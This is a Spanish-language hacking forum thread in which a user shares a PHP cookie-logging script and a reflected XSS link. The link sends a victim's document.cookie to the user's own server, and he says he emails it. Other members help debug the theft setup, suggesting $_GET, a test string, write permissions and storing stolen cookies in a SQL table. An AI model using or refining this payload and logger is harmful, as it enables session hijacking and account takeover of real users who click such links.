magarcan
 Desconectado
Mensajes: 65
|
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies. Para ello: -He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie. -Mando un email con un hipervínculo a la url vulnerable+script. El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS Adjuntos: Mi script PHP <?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?> Lo que pongo en el hipervínculo: http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script> |
|
|
|
|
En línea
|
|
|
|
EvilGoblin
Desconectado
Mensajes: 808
LAIN IS LAIN
|
y estas seguro que esa persona esta logueada? pork de no ser asi recibiras el archivo en blanco.. y creo que en el txt te falta el $_GET para capturar la Cookie desde el link con el metodo get =D Suerte  |
|
|
|
|
En línea
|
 Experimental Serials Lain |
|
|
Ing_Amc
WebDeveloper & DB Designer
Colaborador
Desconectado
Mensajes: 4.385
Tomalaaaa
|
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies. Para ello: -He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie. -Mando un email con un hipervínculo a la url vulnerable+script. El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS Adjuntos: Mi script PHP <?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?> Lo que pongo en el hipervínculo: http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script> Dale http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
|
|
|
|
|
En línea
|
La gente sueña por la noche con volar, nosotros salimos por la noche y volamos. JMF. |
|
|
magarcan
Desconectado
Mensajes: 65
|
Gracias por las respuestas. y estas seguro que esa persona esta logueada? Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas. y creo que en el txt te falta el $_GET para capturar la Cookie desde el link ¿En que parte del código? Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido? |
|
|
|
|
En línea
|
|
|
|
EvilGoblin
Desconectado
Mensajes: 808
LAIN IS LAIN
|
te dice que le agreges una cadena, para comprobar verdaderamente si guarda el texto ;P
si te guarda solo "blablabla"
es que no habia cookie para guardar ^^
|
|
|
|
|
En línea
|
Experimental Serials Lain |
|
|
magarcan
Desconectado
Mensajes: 65
|
Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas.  A ver si tengo suerte. |
|
|
|
|
En línea
|
|
|
|
EvilGoblin
Desconectado
Mensajes: 808
LAIN IS LAIN
|
Creo que no es nada dificil comprobar si el error de XSS sigue funcionado  se supone q vos lo encontraste..... y no sabes como capturar la cookie? xDD no entiendo aun como pudiste encontrarlo.. y menos aun como no sabes comprobar si funciona o no... y capturar la cookie -.- aniway! ^^=D MUCHA SUERTE (Y) |
|
|
|
|
En línea
|
Experimental Serials Lain |
|
|
magarcan
Desconectado
Mensajes: 65
|
Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.
PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.
---GRACIAS---
|
|
|
|
|
En línea
|
|
|
|
zhynar_X
Desconectado
Mensajes: 516
Use linux my friend...
|
|
|
|
|
|
En línea
|
Me he creado un blog: http://zhynar.blogspot.com Aver si os gusta!  Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo) |
|
|
|
|
|
G4rBaG3
|
Hola, recomiendo crear el txt primero.
Saludos.
|
|
|
|
|
En línea
|
Don't worry, be hacked....
|
|
|
zhynar_X
Desconectado
Mensajes: 516
Use linux my friend...
|
Hola, recomiendo crear el txt primero.
Saludos.
Indicando el modo "a" al abrir el archivo crea autmomaticamente el txt Saludos! |
|
|
|
|
En línea
|
Me he creado un blog: http://zhynar.blogspot.com Aver si os gusta! Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo) |
|
|
|
Azielito
|
si no te genera/escribe en el documento es por que no tienes lo spermisos apra escribir en el, dale permisos de escritura ¬¬
para verificar que sea vulnerable es facil ¬¬
|
|
|
|
|
En línea
|
|
|
|
Ferсhu
Desconectado
Mensajes: 1.212
Menos palabras y Mas codigos.
|
si tu pagina esta en un server de internet dificilmente tenga permisos para escribir, si esta en tu pc dale permisos y sino usa sql y crea una tabla, insertas la cookie como dato y listo.
Verifica q las cosas funcionen por pasos, no crees todo y dsp no sabes q es lo q no anda jeje.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
Ing_Amc
WebDeveloper & DB Designer
Colaborador
Desconectado
Mensajes: 4.385
Tomalaaaa
|
Aprende PHP primero xD
|
|
|
|
|
En línea
|
La gente sueña por la noche con volar, nosotros salimos por la noche y volamos. JMF. |
|
|
|
Autor
